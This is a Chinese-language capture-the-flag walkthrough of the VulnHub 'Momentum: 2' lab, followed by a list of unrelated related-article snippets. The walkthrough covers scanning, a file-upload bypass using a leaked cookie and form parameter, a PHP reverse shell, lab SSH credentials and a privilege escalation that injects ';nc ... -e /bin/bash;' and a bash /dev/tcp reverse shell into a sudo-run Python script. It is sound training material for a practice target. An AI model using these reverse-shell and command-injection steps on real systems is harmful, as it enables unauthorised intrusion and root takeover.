靶場練習第二十二天~vulnhub靶場之Momentum-2

一、準備工作

靶機下載地址:Momentum: 2 ~ VulnHub

1.查看kali的ip

使用命令ifconfig

2.使用nmap命令

nmap 192.168.101.0/24

查看開放的端口和協議:nmap -sV 192.168.101.114

二、信息收集

1.使用gobuster,尋找隱藏的網站

gobuster dir -u http://192.168.101.114/ -x html,php,txt,php.bak,bak -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

發現一個可以上傳文件的網站:http://192.168.101.114/dashboard.html

2.利用bp抓包軟件將文件上傳

上傳一句話木馬php文件

訪問http://192.168.101.114/ajax.php.bak看到一個文件,如果參數為secure,值等于val1d就允許上傳pdf、php、txt文件

抓包添加cookie與參數

cookie: admin=&G6u@B6uDXMq&Ms

-----------------------------150269877033212106221702063904

Content-Disposition: form-data; name="secure";

val1d

還有將一句話木馬改成反向連接木馬,自動生成的反向連接木馬地址:https://forum.ywhack.com/reverse-shell/將自動生成的php反向連接腳本替換掉一句話木馬

將修改好的數據發送到intruder里面進行爆破

添加要爆破的參數將事先寫好的26大寫英文字母字典添加到Payload Options爆破返回的長度一樣,查看返回的參數哪個有1

將數據上傳,可以發現上傳成功

三、提權

1.利用php反向連接腳本連接靶機

(1)在kali開啟監聽功能:nc -lvvp 8888

(2)訪問剛才上傳的反向連接腳本

(3)看一看kali那邊連接情況,已經反向連接成功了

(4)第一個flag

(5)ssh遠程連接

發現一個用戶密碼: athena、myvulnerableapp*,使用命令:ssh athena@192.168.101.114

(6)提權payload

查看該用戶的權限并且該用戶能夠利用引用root相關的執行文件有哪些

1.cat /home/team-tasks/cookie-gen.py

將反彈root權限的shell命令存入seed變量執行

echo "bash -c 'exec bash -i &>/dev/tcp/192.168.101.114/4444 <&1'" | base64

1.sudo -u root /usr/bin/python3 /home/team-tasks/cookie-gen.py

2.;nc 192.168.101.10 4444 -e /bin/bash;

3.反向連接:nc -lnvp 4444

4.優化命令執行終端,執行下面命令進入python交互式(注意要下載python環境才能運行):

python -c ‘import pty;pty.spawn(“/bin/bash”)’

5.第二flag

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/375017.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/375017.shtml
英文地址,請注明出處:http://en.pswp.cn/news/375017.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

索引深入淺出(8/10):覆蓋索引或列包含

在索引深入淺出&#xff1a;非聚集索引的B樹結構在聚集表里&#xff0c;在聚集表里&#xff0c;我們看到非聚集索引的葉子層只包含非聚集索引鍵和聚集索引鍵。從聚集表結構或堆表結構里拿到剩下列&#xff0c;SQL Server需要進行書簽/鍵查找操作。很多情況下書簽或鍵查找非常消…

靶場練習第二十三天~vulnhub靶場之GOATSELINUX: 1

一、準備工作 kali和靶機都選擇NAT模式&#xff08;kali與靶機同網段&#xff09; 1.靶場環境 下載鏈接:GoatseLinux: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶機的ip 掃描靶機ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;掃描靶機…

Spring事務報Connection is read-only

昨天做項目時&#xff0c;寫了個方法,程序突然報了Connection is readonly. Queries leading to data modification are not allowed調了程序半天&#xff0c;最后才發現是自己在spring配置文件中增加了事務.把方法寫成了大寫開頭了&#xff0c;但是spring配置是以小寫開頭 代碼…

HTTP協議具體解釋

HTTP是一個屬于應用層的面向對象的協議。因為其簡捷、高速的方式。適用于分布式超媒體信息系統。它于1990年提出&#xff0c;經過幾年的使用與發展&#xff0c;得到不斷地完好和擴展。眼下在WWW中使用的是HTTP/1.0的第六版&#xff0c;HTTP/1.1的規范化工作正在進行之中&#x…

靶場練習第二十四天~vulnhub靶場之Raven-1

一、準備工作 kali和靶機都選擇NAT模式&#xff08;kali與靶機同網段&#xff09; 1.靶場環境 下載鏈接:Raven: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶機的ip 掃描靶機ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;掃描靶機開放的…

【知識積累】DES算法之C#加密Java解密

一、前言 在項目需要添加安全模塊&#xff0c;客戶端調用服務端發布的service必須要經過驗證&#xff0c;加密算法采用DES&#xff0c;客戶端采用C#進行加密&#xff0c;服務端使用Java進行解密。廢話不多說&#xff0c;直接上代碼。 二、客戶端 客戶端采用C#進行開發&#xff…

Space.js – HTML 驅動的頁面 3D 滾動效果

為了讓我們的信息能夠有效地溝通&#xff0c;我們需要創建用戶和我們的媒體之間的強有力的聯系。今天我們就來探討在網絡上呈現故事的新方法&#xff0c;并為此創造了一個開源和免費使用的 JavaScript 庫稱為 space.js。該庫是 HTML 驅動的&#xff0c;這意味著你不需要在網站上…

離職感言-Symbio的5年工作回顧和總結(轉載)

離職感言-Symbio的5年工作回顧和總結 (2011-06-02 21:06:30) 轉載▼2005年底&#xff0c;當時我在西安過的還不錯&#xff0c;結了婚&#xff0c;買了房&#xff0c;在公司也受老板器重&#xff0c;但是初為人父&#xff0c;孩子帶給我的那種人生緊迫感&#xff1a;“再不趁還…

64位CentOS6.2安裝erlang及rabbitmqServer

CentOS 6.2 64bit 安裝erlang及RabbitMQ Server 1、操作系統環境(CentOS 6.2 64bit) 1 [rootHAproxy ~]# cat /etc/issue2 3 CentOS release 6.2 (Final)4 Kernel \r on an \m5 [rootHAproxy ~]# cat /proc/cpuinfo |grep "clflush size"6 clflush size : 647 clf…

Kafka的Producer和Consumer源碼學習

先解釋下兩個概念&#xff1a; high watermark (HW) 它表示已經被commited的最后一個message offset(所謂commited, 應該是ISR中所有replica都已寫入)&#xff0c;HW以下的消息都已被ISR中各個replica同步&#xff0c;從而保持一致。HW以上的消息可能是臟數據&#xff1a;部分r…

for+next()實現數組的遍歷及while list each 的使用

//要求使用for循環語句來完成該數組的遍歷//輸出每一項的鍵名和對應值&#xff1a; $a array( a > 34, 5 > 51, 13, 32, bb>15, 2 > 31 ); $len count($a); for($i0;$i<$len;$i)…

讀Pyqt4教程,帶你入門Pyqt4 _005

對話框窗體或對話框是現代GUI應用不可或缺的一部分。dialog定義為兩個或多個人之間的交談。在計算機程序中dialog是一個窗體&#xff0c;用來和程序“交談”。對話框用來輸入數據、修改數據、改變程序設置等等。對話框是用戶和計算機程序溝通的重要手段。 QColorDialog 顏色對話…

Linux內核的啟動過程分析

秦鼎濤 《Linux內核分析》MOOC課程http://mooc.study.163.com/course/USTC-1000029000  一、實驗目的及要求&#xff1a; 使用gdb跟蹤調試內核從start_kernel到init進程啟動 詳細分析從start_kernel到init進程啟動的過程并結合實驗截圖撰寫一篇署名博客&#xff0c;并在博客文…

static修飾符詳解

static表示“全局”或者“靜態”的意思&#xff0c;用來修飾成員變量和成員方法&#xff0c;也可以形成靜態static代碼塊&#xff0c;但是Java語言中沒有全局變量的概念。被static修飾的成員變量和成員方法獨立于該類的任何對象。也就是說&#xff0c;它不依賴類特定的實例&…

四則運算2+psp0

程序要求&#xff1a; 1.題目避免重復 2.可定制&#xff08;數量\打印方式&#xff09; 3.可以一下控制參數 ① 是否有乘除法 ② 是否有括號&#xff08;最多支持十個數參與運算&#xff09; ③ 數值范圍 ④加減有無負數 ⑤除法有無余數 分析&#xff1a;① 如果是兩個數…

kettle作業中的js如何寫日志文件

在kettle作業中JavaScript腳本有時候也扮演非常重要的角色&#xff0c;此時我們希望有一些日志記錄。下面是job中JavaScript記錄日志的方式。 job的js寫日志的方法。 得到日志輸出實例 org.pentaho.di.core.logging.LogWriter.getInstance();按照日志的級別輸出&#xff1a; pu…

淺析Kerberos原理,及其應用和管理

文章作者&#xff1a;luxianghao 文章來源&#xff1a;http://www.cnblogs.com/luxianghao/p/5269739.html 轉載請注明&#xff0c;謝謝合作。 免責聲明&#xff1a;文章內容僅代表個人觀點&#xff0c;如有不當&#xff0c;歡迎指正。 --- 一&#xff0c;引言 Kerberos簡單來…

2014! 的末尾有多少個0

2014&#xff01; 的末尾有多少個0<?xml version"1.0" encoding"UTF-8"?> 假設 末尾有 k 個0&#xff0c;所以 2014&#xff01; x * 10^k ; 10 ^ k &#xff08;2 * 5 &#xff09;^ k 2^k * 5^k, 明顯所有數字中因數含有2的數字多于含有5的數…

[轉載]一句話插配置文件

http://www.t00ls.net/viewthread.php?tid13901 一句話插入配置文件system.asp沒有過濾雙引號&#xff0c;插入一句就行。常規插法如下&#xff1a;"%><%eval request("d")%><%但金刀客這篇文件&#xff08;http://www.cqzh.cn/post/328.html&…

android插件化-獲取apkplug框架已安裝插件-03

上一篇文章成功的將apkplug框架嵌入了應用中而且啟動 鏈接http://www.apkplug.com/blog/?post10 這一篇文章實現怎樣獲取全部已安裝插件 一 獲取框架的SystemBundle的上下文BundleContext apkplug框架啟動會自己主動創建一個SystemBundle, 它是框架的第一個插件不可停止和卸…